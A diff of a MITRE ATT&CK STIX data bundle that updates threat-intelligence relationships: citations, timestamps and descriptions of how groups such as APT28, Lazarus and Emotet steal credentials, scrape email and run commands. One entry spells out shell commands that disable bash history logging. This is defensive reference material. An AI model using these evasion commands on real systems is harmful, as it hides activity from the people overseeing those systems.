"attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "external_references": [ { @@ -172682,7 +177877,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "external_references": [ { @@ -173855,21 +179050,26 @@ "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "external_references": [ { - "source_name": "ESET Sednit Part 2", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", - "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + "source_name": "ESET Sednit Part 2" }, { "source_name": "DOJ GRU Indictment Jul 2018", "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", "url": "https://www.justice.gov/file/1080281/download" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." } ], - "description": "[APT28](https://attack.mitre.org/groups/G0007) regularly deploys both publicly available (ex: [Mimikatz](https://attack.mitre.org/software/S0002)) and custom password retrieval tools on victims.(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)\t", + "description": "[APT28](https://attack.mitre.org/groups/G0007) regularly deploys both publicly available (ex: [Mimikatz](https://attack.mitre.org/software/S0002)) and custom password retrieval tools on victims.(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)(Citation: US District Court Indictment GRU Oct 2018)\t", "relationship_type": "uses", "id": "relationship--c7e8689c-25cf-4fac-926e-c55a2414f16c", "type": "relationship", - "modified": "2020-03-19T22:05:06.704Z", + "modified": "2020-10-01T18:55:37.709Z", "created": "2020-03-19T22:05:06.704Z" }, { @@ -174301,13 +179501,18 @@ "source_name": "Trend Micro Emotet Jan 2019", "url": "https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf", "description": "Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019." + }, + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." } ], - "description": "[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping browser password grabber modules. (Citation: Trend Micro Emotet Jan 2019)", + "description": "[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping browser password grabber modules. (Citation: Trend Micro Emotet Jan 2019)(Citation: IBM IcedID November 2017)", "relationship_type": "uses", "id": "relationship--7ac04e64-a09e-4a66-b6ce-047030400045", "type": "relationship", - "modified": "2020-07-15T13:03:46.804Z", + "modified": "2020-07-15T18:05:15.624Z", "created": "2020-03-19T22:47:20.671Z" }, { @@ -175553,24 +180758,29 @@ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "external_references": [ { - "source_name": "Novetta Blockbuster", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", - "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + "source_name": "Novetta Blockbuster" }, { - "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", - "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + "source_name": "Novetta Blockbuster Destructive Malware" }, { - "source_name": "McAfee Lazarus Resurfaces Feb 2018", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", - "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/" + "source_name": "McAfee Lazarus Resurfaces Feb 2018" }, { - "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", + "source_name": "US-CERT SHARPKNOT June 2018", "description": "US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.", - "source_name": "US-CERT SHARPKNOT June 2018" + "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" + }, + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." }, { "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/", @@ -175578,11 +180788,11 @@ "source_name": "McAfee GhostSecret" } ], - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses cmd.exe to execute commands on victims.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: US-CERT SHARPKNOT June 2018) A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) uses a batch file mechanism to delete its binaries from the system.(Citation: McAfee GhostSecret)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses cmd.exe to execute commands on victims.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: US-CERT SHARPKNOT June 2018)(Citation: F-Secure Lazarus Cryptocurrency Aug 2020) A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) uses a batch file mechanism to delete its binaries from the system.(Citation: McAfee GhostSecret)", "relationship_type": "uses", "id": "relationship--032981a6-3299-4852-bd9c-c691f866bec5", "type": "relationship", - "modified": "2020-03-20T17:32:15.908Z", + "modified": "2020-09-22T16:26:53.405Z", "created": "2020-03-20T02:33:03.035Z" }, { @@ -176309,7 +181519,7 @@ "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for logon scripts that may lead to persistence.", "id": "relationship--9e755287-a238-485c-83c3-7afeac5a9243", "type": "relationship", - "modified": "2020-03-24T23:07:28.504Z", + "modified": "2020-08-03T16:47:37.428Z", "created": "2020-03-24T23:04:42.404Z" }, { @@ -176573,7 +181783,7 @@ "description": "Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers.", "id": "relationship--246e4d06-8646-4f9a-8d7c-1efd98fd11c1", "type": "relationship", - "modified": "2020-03-31T12:52:04.911Z", + "modified": "2020-10-12T21:38:13.217Z", "created": "2020-03-25T18:30:50.103Z" }, { @@ -176594,7 +181804,7 @@ } ], "type": "relationship", - "modified": "2020-03-31T12:52:04.910Z", + "modified": "2020-10-12T21:38:13.248Z", "created": "2020-03-25T18:30:50.106Z" }, { @@ -176608,7 +181818,7 @@ "description": "If it is necessary that software must store credentials in the Registry, then ensure the associated accounts have limited permissions so they cannot be abused if obtained by an adversary.", "id": "relationship--e30864c0-df50-403b-9ad0-ef744a5d7449", "type": "relationship", - "modified": "2020-03-31T12:52:04.938Z", + "modified": "2020-10-12T21:38:13.251Z", "created": "2020-03-25T18:30:50.108Z" }, { @@ -176622,7 +181832,7 @@ "description": "Use strong passphrases for private keys to make cracking difficult. Do not store credentials within the Registry. Establish an organizational policy that prohibits password storage in files.", "id": "relationship--529b0951-548c-4316-93d1-baf97d89f10a", "type": "relationship", - "modified": "2020-03-31T12:52:04.936Z", + "modified": "2020-10-12T21:38:13.246Z", "created": "2020-03-25T18:30:50.113Z" }, { @@ -176636,7 +181846,7 @@ "description": "There are multiple methods of preventing a user's command history from being flushed to their .bash_history file, including use of the following commands:\nset +o history and set -o history to start logging again;\nunset HISTFILE being added to a user's .bash_rc file; and\nln -s /dev/null ~/.bash_history to write commands to /dev/nullinstead.", "id": "relationship--5401a61d-a795-4619-aa7e-fdf54cd4358e", "type": "relationship", - "modified": "2020-03-31T12:52:04.940Z", + "modified": "2020-10-12T21:38:13.272Z", "created": "2020-03-25T18:30:50.111Z" }, { @@ -176650,7 +181860,7 @@ "description": "When possible, store keys on separate cryptographic hardware instead of on the local system. ", "id": "relationship--069ff8f0-889c-4463-bf5d-618bf5e457ee", "type": "relationship", - "modified": "2020-03-31T12:52:04.937Z", + "modified": "2020-10-12T21:38:13.270Z", "created": "2020-03-25T18:30:50.135Z" }, { @@ -176824,7 +182034,7 @@ "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.", "id": "relationship--0fc95a6b-296f-41ab-8663-aea4a80afe0a", "type": "relationship", - "modified": "2020-06-20T20:11:42.902Z", + "modified": "2020-09-16T16:49:47.902Z", "created": "2020-03-26T18:45:03.794Z" }, { @@ -177074,7 +182284,7 @@ } ], "type": "relationship", - "modified": "2020-03-31T12:52:04.912Z", + "modified": "2020-10-12T21:38:13.283Z", "created": "2020-03-27T19:50:02.358Z" }, { @@ -177610,7 +182820,7 @@ "description": "Limit access to network infrastructure and resources that can be used to reshape traffic or otherwise produce MiTM conditions.", "id": "relationship--0f9283d3-3b13-47ca-9757-7a7739738356", "type": "relationship", - "modified": "2020-03-28T01:40:23.124Z", + "modified": "2020-10-16T15:14:23.720Z", "created": "2020-03-28T01:37:57.431Z" }, { @@ -177624,7 +182834,7 @@ "description": "Network intrusion detection and prevention systems that can identify traffic patterns indicative of MiTM activity can be used to mitigate activity at the network level.", "id": "relationship--911ca56b-8fd3-4efc-855c-f1754c8b05b7", "type": "relationship", - "modified": "2020-03-28T01:40:23.089Z", + "modified": "2020-10-16T15:14:23.756Z", "created": "2020-03-28T01:37:57.435Z" }, { @@ -177638,7 +182848,7 @@ "description": "Network segmentation can be used to isolate infrastructure components that do not require broad network access. This may mitigate, or at least alleviate, the scope of MiTM activity.", "id": "relationship--a19d3dcf-29a2-4e3f-9138-55dc8ace1ee5", "type": "relationship", - "modified": "2020-03-28T01:40:23.122Z", + "modified": "2020-10-16T15:14:23.762Z", "created": "2020-03-28T01:37:57.453Z" }, { @@ -177736,7 +182946,7 @@ "description": "Proactively reset accounts that are known to be part of breached credentials either immediately, or after detecting bruteforce attempts.", "id": "relationship--b61fb6ca-82b8-4928-8f1b-7a48645bd888", "type": "relationship", - "modified": "2020-03-29T20:35:55.621Z", + "modified": "2020-10-21T16:38:28.253Z", "created": "2020-03-29T20:34:24.708Z" }, { @@ -177750,7 +182960,7 @@ "description": "Proactively reset accounts that are known to be part of breached credentials either immediately, or after detecting bruteforce attempts.", "id": "relationship--a69c1383-0afc-40d5-879c-fda561aff983", "type": "relationship", - "modified": "2020-03-31T13:11:21.525Z", + "modified": "2020-09-16T15:38:40.917Z", "created": "2020-03-29T20:35:36.808Z" }, { @@ -177847,13 +183057,18 @@ "source_name": "CIS Emotet Dec 2018", "url": "https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/", "description": "CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019." + }, + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." } ], - "description": "[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)", + "description": "[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)(Citation: IBM IcedID November 2017)", "relationship_type": "uses", "id": "relationship--d3dbd171-a82c-4fef-ba16-2355dd9b513e", "type": "relationship", - "modified": "2020-07-15T13:03:46.811Z", + "modified": "2020-07-15T18:05:15.653Z", "created": "2020-03-29T22:57:53.216Z" }, { @@ -178421,7 +183636,7 @@ "description": "Routinely monitor user permissions to ensure only the expected users have the capability to modify cloud compute infrastructure components.", "id": "relationship--91c4630e-772b-4dac-8e58-5a899ccdc2be", "type": "relationship", - "modified": "2020-06-18T11:38:27.847Z", + "modified": "2020-09-14T19:54:58.801Z", "created": "2020-04-27T14:14:05.600Z" }, { @@ -178997,7 +184212,7 @@ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "source_name": "FireEye APT41 March 2020", @@ -180350,7 +185565,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180358,7 +185573,7 @@ "relationship_type": "uses", "id": "relationship--7393547f-0d33-4070-9569-733e15c72e73", "type": "relationship", - "modified": "2020-05-05T18:47:47.313Z", + "modified": "2020-10-14T14:40:36.351Z", "created": "2020-05-05T18:47:47.313Z" }, { @@ -180371,7 +185586,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180379,7 +185594,7 @@ "relationship_type": "uses", "id": "relationship--e80f97df-4984-4e62-bba6-1333d4c2c977", "type": "relationship", - "modified": "2020-05-05T18:47:47.317Z", + "modified": "2020-10-14T14:40:36.366Z", "created": "2020-05-05T18:47:47.317Z" }, { @@ -180392,7 +185607,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180400,7 +185615,7 @@ "relationship_type": "uses", "id": "relationship--4151f66f-efcc-4c26-b3b6-8650c0a36258", "type": "relationship", - "modified": "2020-05-05T18:47:47.346Z", + "modified": "2020-10-14T14:40:36.389Z", "created": "2020-05-05T18:47:47.346Z" }, { @@ -180460,7 +185675,7 @@ }, { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180468,7 +185683,7 @@ "relationship_type": "uses", "id": "relationship--62bf12af-cf11-48e7-8963-4fdf3e23fea0", "type": "relationship", - "modified": "2020-05-05T18:47:47.370Z", + "modified": "2020-10-14T14:40:36.408Z", "created": "2020-05-05T18:47:47.370Z" }, { @@ -180486,7 +185701,7 @@ }, { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180494,7 +185709,7 @@ "relationship_type": "uses", "id": "relationship--c068603b-bfab-4efd-92c2-01f8d696ea88", "type": "relationship", - "modified": "2020-05-05T18:47:47.385Z", + "modified": "2020-10-14T14:40:36.418Z", "created": "2020-05-05T18:47:47.385Z" }, { @@ -180507,7 +185722,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180515,7 +185730,7 @@ "relationship_type": "uses", "id": "relationship--ee00cd55-254b-4780-be47-e0f78a327c93", "type": "relationship", - "modified": "2020-05-05T19:37:33.806Z", + "modified": "2020-10-14T14:40:36.473Z", "created": "2020-05-05T18:53:08.295Z" }, { @@ -180528,7 +185743,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180536,7 +185751,7 @@ "relationship_type": "uses", "id": "relationship--7b4b8d0b-fbc3-469a-ab62-72c5c4c4653d", "type": "relationship", - "modified": "2020-05-07T03:04:14.843Z", + "modified": "2020-10-14T14:40:36.476Z", "created": "2020-05-05T19:37:33.740Z" }, { @@ -180549,7 +185764,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180557,7 +185772,7 @@ "relationship_type": "uses", "id": "relationship--aa5d5fcd-db19-4593-a958-b09853ceb372", "type": "relationship", - "modified": "2020-05-06T18:42:54.351Z", + "modified": "2020-10-14T14:40:36.513Z", "created": "2020-05-05T19:37:33.765Z" }, { @@ -180570,7 +185785,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180578,7 +185793,7 @@ "relationship_type": "uses", "id": "relationship--20599767-204a-4cbf-ada7-0f931ee925e4", "type": "relationship", - "modified": "2020-05-05T19:37:33.769Z", + "modified": "2020-10-14T14:40:36.548Z", "created": "2020-05-05T19:37:33.769Z" }, { @@ -180591,7 +185806,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180599,7 +185814,7 @@ "relationship_type": "uses", "id": "relationship--3f010259-666c-403b-b5c7-603b319583da", "type": "relationship", - "modified": "2020-05-05T19:37:33.785Z", + "modified": "2020-10-14T14:40:36.542Z", "created": "2020-05-05T19:37:33.785Z" }, { @@ -180612,7 +185827,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -180620,7 +185835,7 @@ "relationship_type": "uses", "id": "relationship--db0f9f05-6f76-47c3-81bf-a59d85045188", "type": "relationship", - "modified": "2020-05-05T19:44:41.806Z", + "modified": "2020-10-14T14:40:36.555Z", "created": "2020-05-05T19:44:41.806Z" }, { @@ -182998,7 +188213,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183006,7 +188221,7 @@ "relationship_type": "uses", "id": "relationship--aac7b4ce-93ee-4feb-83da-3b2600ad75b0", "type": "relationship", - "modified": "2020-05-07T02:33:06.795Z", + "modified": "2020-10-14T14:40:36.515Z", "created": "2020-05-07T02:33:06.795Z" }, { @@ -183019,7 +188234,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183027,7 +188242,7 @@ "relationship_type": "uses", "id": "relationship--c3aa5639-a8e1-4de3-8f39-cc98593973ed", "type": "relationship", - "modified": "2020-05-11T17:17:00.379Z", + "modified": "2020-10-14T14:40:36.557Z", "created": "2020-05-07T02:33:06.892Z" }, { @@ -183061,7 +188276,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183069,7 +188284,7 @@ "relationship_type": "uses", "id": "relationship--106cf74b-91d6-4348-91ae-48d1a42abb73", "type": "relationship", - "modified": "2020-05-07T02:33:06.912Z", + "modified": "2020-10-14T14:40:36.516Z", "created": "2020-05-07T02:33:06.912Z" }, { @@ -183082,7 +188297,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183090,7 +188305,7 @@ "relationship_type": "uses", "id": "relationship--2f0fee17-1cd1-45dd-a1e0-f854c03ed064", "type": "relationship", - "modified": "2020-05-07T02:33:06.926Z", + "modified": "2020-10-14T14:40:36.539Z", "created": "2020-05-07T02:33:06.926Z" }, { @@ -183103,7 +188318,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183111,7 +188326,7 @@ "relationship_type": "uses", "id": "relationship--45c4d1f9-414f-4542-8272-c783f7314514", "type": "relationship", - "modified": "2020-05-07T22:39:23.978Z", + "modified": "2020-10-14T14:40:36.546Z", "created": "2020-05-07T02:33:06.936Z" }, { @@ -183124,7 +188339,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183132,7 +188347,7 @@ "relationship_type": "uses", "id": "relationship--239cb026-369a-43f0-922c-cdc38d124430", "type": "relationship", - "modified": "2020-05-07T02:33:06.943Z", + "modified": "2020-10-14T14:40:36.558Z", "created": "2020-05-07T02:33:06.943Z" }, { @@ -183145,7 +188360,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183153,7 +188368,7 @@ "relationship_type": "uses", "id": "relationship--14307b7b-0837-4c15-a959-0c8d24e05b6b", "type": "relationship", - "modified": "2020-05-07T02:33:07.057Z", + "modified": "2020-10-14T14:40:36.590Z", "created": "2020-05-07T02:33:07.057Z" }, { @@ -183166,7 +188381,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183174,7 +188389,7 @@ "relationship_type": "uses", "id": "relationship--5cabd775-7d78-4150-b529-bb8cfb747013", "type": "relationship", - "modified": "2020-05-07T03:04:14.719Z", + "modified": "2020-10-14T14:40:36.587Z", "created": "2020-05-07T03:04:14.719Z" }, { @@ -183208,7 +188423,7 @@ "external_references": [ { "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183216,7 +188431,7 @@ "relationship_type": "uses", "id": "relationship--d4922804-7216-4e83-b0c0-6e61b09d5fc0", "type": "relationship", - "modified": "2020-05-07T22:32:37.695Z", + "modified": "2020-10-14T14:40:36.592Z", "created": "2020-05-07T22:32:37.695Z" }, { @@ -183229,7 +188444,7 @@ "external_references": [ 